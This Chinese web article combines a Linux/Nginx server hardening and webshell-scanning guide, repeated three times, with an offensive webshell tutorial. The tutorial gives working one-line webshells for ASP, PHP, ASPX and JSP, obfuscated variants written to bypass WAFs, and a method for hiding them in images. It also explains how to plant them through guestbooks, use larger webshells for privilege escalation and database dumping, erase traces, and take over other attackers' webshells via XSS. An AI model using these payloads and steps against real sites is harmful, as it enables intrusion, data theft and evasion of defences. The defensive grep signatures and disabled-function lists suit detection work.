木马和后门的查杀是系统管理员一项长期需要坚持的工作，特别是如今入侵攻击越来越频繁，如果服务器自身的安全防护工作没有做好，很可能随时都会被入侵挂上木马后门。那么服务器木马后门怎么查杀?我们一起来了解下。
服务器木马后门怎么查杀
windows服务器的木马后门查杀教程相对校对，这里就介绍linux系统服务器的后门查杀方法，以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法：
一、Web Server(以Nginx为例)
1、为防止跨站感染，将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)
2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)
3、path_info漏洞修正：
在nginx配置文件中增加：
if ($request_filename ~* (.*).php) {set $php_url $1;　 　}if (!-e $php_url.php) {return 404; 　}
4、重新编译Web Server，隐藏Server信息
5、打开相关级别的日志，追踪可疑请求，请求者IP等相关信息。
二.改变目录和文件属性，禁止写入
find -type f -name *.php -exec chmod 444 {} ;find -type d -exec chmod 555 {} ;
注：当然要排除上传目录、缓存目录等;
同时最好禁止chmod函数，攻击者可通过chmod来修改文件只读属性再修改文件!
三.PHP配置
修改php.ini配置文件，禁用危险函数：
disable_funcions = dl,eval,exec,passthru,system,popen,shell_exec,proc_open,proc_terminate,curl_exec,curl_multi_exec,show_source,touch,escapeshellcmd,escapeshellarg
四.MySQL数据库账号安全：
禁止mysql用户外部链接，程序不要使用root账号，最好单独建立一个有限权限的账号专门用于Web程序。
五.查杀木马、后门
grep -r –include=*.php ‘[^a-z]eval($_POST’ . > grep.txtgrep -r –include=*.php ‘file_put_contents(.*$_POST[.*]);’ . > grep.txt
把搜索结果写入文件，下载下来慢慢分析，其他特征木马、后门类似。有必要的话可对全站所有文件来一次特征查找，上传图片肯定有也捆绑的，来次大清洗。
查找近2天被修改过的文件：
find -mtime -2 -type f -name *.php
注意：攻击者可能会通过touch函数来修改文件时间属性来避过这种查找，所以touch必须禁止
六.及时给Linux系统和Web程序打补丁，堵上漏洞
关于服务器木马后门怎么查杀就为大家介绍到这里，如果不懂得linux系统配置的朋友也没关系，可以去下载服务器安全狗这款软件，可以自动帮忙优化服务器和查杀木马后门，是专门为服务器安全而研发的免费软件，有需要的朋友可以自行下载。

木马和后门的查杀是系统管理员一项长期需要坚持的工作，切不可掉以轻心。以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法：
一、Web Server(以Nginx为例)
1、为防止跨站感染，将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)
2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)
3、path_info漏洞修正：
在nginx配置文件中增加：
if ($request_filename ~* (。*).php) {
set $php_url $1;
}
if (!-e $php_url.php) {
return 404;
}
4、重新编译Web Server,隐藏Server信息
5、打开相关级别的日志，追踪可疑请求，请求者IP等相关信息。
二、改变目录和文件属性，禁止写入
find -type f -name *.php -exec chmod 444 {} ;
find -type d -exec chmod 555 {} ;
注：当然要排除上传目录、缓存目录等;
同时最好禁止chmod函数，攻击者可通过chmod来修改文件只读属性再修改文件!
三、PHP配置
修改php.ini配置文件，禁用危险函数：
disable_funcions = dl,eval,exec,passthru,system,popen,shell_exec,proc_open,proc_terminate,curl_exec,curl_multi_exec,
show_source,touch,escapeshellcmd,escapeshellarg
四、MySQL数据库账号安全：
禁止mysql用户外部链接，程序不要使用root账号，最好单独建立一个有限权限的账号专门用于Web程序。
五、查杀木马、后门
grep -r –include=*.php '[^a-z]eval($_POST' . > grep.txt
grep -r –include=*.php 'file_put_contents(。*$_POST[.*]);' . > grep.txt
把搜索结果写入文件，下载下来慢慢分析，其他特征木马、后门类似。有必要的话可对全站所有文件来一次特征查找，上传图片肯定有也捆绑的，来次大清洗。
查找近2天被修改过的文件：
find -mtime -2 -type f -name *.php
注意：攻击者可能会通过touch函数来修改文件时间属性来避过这种查找，所以touch必须禁止
六、及时给Linux系统和Web程序打补丁，堵上漏洞

木马和后门的查杀是系统管理员一项长期需要坚持的工作，切不可掉以轻心。以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法：
一、Web Server(以Nginx为例)
1、为防止跨站感染，将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)
2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)
3、path_info漏洞修正：
在nginx配置文件中增加：
if ($request_filename ~* (.*).php) {set $php_url $1;　       　}if (!-e $php_url.php) {return 404;   　}
4、重新编译Web Server，隐藏Server信息
5、打开相关级别的日志，追踪可疑请求，请求者IP等相关信息。
二.改变目录和文件属性，禁止写入
find -type f -name *.php -exec chmod 444 {} ;find -type d -exec chmod 555 {} ;
注：当然要排除上传目录、缓存目录等；
同时最好禁止chmod函数，攻击者可通过chmod来修改文件只读属性再修改文件！
三.PHP配置
修改php.ini配置文件，禁用危险函数：
disable_funcions = dl,eval,exec,passthru,system,popen,shell_exec,proc_open,proc_terminate,curl_exec,curl_multi_exec,show_source,touch,escapeshellcmd,escapeshellarg
四.MySQL数据库账号安全：
禁止mysql用户外部链接，程序不要使用root账号，最好单独建立一个有限权限的账号专门用于Web程序。
五.查杀木马、后门
grep -r –include=*.php  ‘[^a-z]eval($_POST’ . > grep.txtgrep -r –include=*.php  ‘file_put_contents(.*$_POST[.*]);’ . > grep.txt
把搜索结果写入文件，下载下来慢慢分析，其他特征木马、后门类似。有必要的话可对全站所有文件来一次特征查找，上传图片肯定有也捆绑的，来次大清洗。
查找近2天被修改过的文件：
find -mtime -2 -type f -name *.php
注意：攻击者可能会通过touch函数来修改文件时间属性来避过这种查找，所以touch必须禁止
六.及时给Linux系统和Web程序打补丁，堵上漏洞

提示：本文所讨论的技术仅用于研究学习，旨在提高大家信息安全意识，任何人不得将其用于非法目的。

@木马及木马后门的讲解，webshell箱子溯源追踪

一：webshell制作原理

webshell:即web网站后门
getshell:是指拿webshell的过程
1.webshell的种类

一句话木马
小马
大马
打包马
脱裤马

2.一句话木马:
介绍：一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。
这是一个一句话木马，我们把它插入到asp的网页中，然后用菜刀链接一下就可以
<%execute request("value")%>
X.asp
xxxx.com/X.asp?value=assdadasad

工作原理：

黑客在注册信息的电子邮箱或者个人主页等中插入类似的如下代码：
<%execute request("value")%>

其中value是值，所以你可以更改自己的值，前面的request就是获取这个值

<%eval request(“value”)%>(现在比较多见，而且字符少，对表单字数有限制的地方特别的实用)

当知道了1数据库的URL，就可以利用本地一张网页进行连接得到webshell。（不知道数据库也可以，只要知道<%eval request(value)%>这个文件被插入到哪一个ASP文件里面就可以了）

这就被称作一句话木马，它是基于B/S结构的。
3.常见写法
asp一句话木马：
<%eval request("c")%>

php一句话木马：
<?php @eval($_POST[value])?>

aspx一句话木马：
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>

jsp一句话：
< % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >

4.一句话木马变形记
让一句话木马变形绕过 WAF：

WAF通常会以关键字判断是否为一句话木马，所以要将一句话木马变形使用，从而绕过 waf。

后期我还会用大量篇幅来具体的讲解一下木马的制作。
<?php $_REQUEST['a']($_REQUEST['b'])?>
<%Eval(Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%a=request("gold")%><%eval a%>

5.一句话图片马的制作
C32下做一句话

打开C32,把图片放里面，写入一句话保存，退出



我们在制作图片马的时候，也可以同时添加asp,php等其他脚本的木马，这样就拥有了两用的木马。

制作图片马时，要尽量找网站素材图片，这些图片管理员看到也不敢乱删
6.常见的一句话客户端：

中国菜刀
冰蝎
蚁剑

这些都是常见的一句话客户端，不过要小心一下后门。
7.小马
小马体积小，容易隐蔽，隐蔽性强，最重要在于与图片结合一起，上传之后可以利用nginx或者IIS6的解析漏洞来运行，不过功能少，一般只有上传等功能，通常用小马上传大马，然后利用大马进行复杂操作后，再删除大马，在渗透过程中要尽量擦除自己留下的痕迹。
8.大马
大马体积比较大，一般50K以上。功能也多，一般都包括提权命令，磁盘管理，数据库连接接口，执行命令甚至有些具备自带提权功能和压缩，解压缩网站程序的功能。这种马隐蔽性不好，而大多如不加密的话很多杀毒厂商开始追杀此类程序。
二：webshell使用技巧
1.一句话的使用：

首先，找到数据库是asp格式的网站，然后，以留言板，或者发表文章的方式，把一句话添加到asp数据库，或者加进asp网页。
记住！我们的目的是把一句话<%execute request(“value”)%>添加到数据库，无论任何方式。
然后打开客户端（就是你电脑上面的那个html文件），填上加入了一句话的asp文件，或者asp网页，然后进入此网站服务器。

2.小马的使用
主要用来上传大马，然后利用大马进行复杂操作后，再删除大马，在渗透过程中要尽量擦除自己留下的痕迹。

下面让我们参观一个小马：


3.大马的使用

用途
提权
打包
脱裤
增删文件

下面让我们看一下大马的情况：



这就是一个大马的界面，大马具有很多的功能，对于后渗透操作将非常有帮助。
4.使用技巧

内容编码
配合解析漏洞
配合文件包含
利用文件名溢出

三：webshell黑吃黑
1.找shell后门

查找后门
查找webshell后门
找到后门地址
反搞webshell箱子

2.找一句话客户端后门

查找客户端程序后门
反搞webshell箱子

3.实验
下面让我们通过一个实验感受一下"webshell黑吃黑"的过程吧：

假设我们已经在某企业网站上种植了我们从别人手中购买的木马。

通过分析发现了如下后门



然后我们再分析一下木马b.asp的文件，果然证实了上面的想法。



面对这种情况，我们该怎么办呢？

别慌！让我们通过XSS来反搞一下。





当然还有cookie信息，有了这些东西我们就能登录这个webshell箱子了



此时，表示我们已经成功的打掉了另一个黑客的阴谋。

你以为我在第一层，不，我在大气层。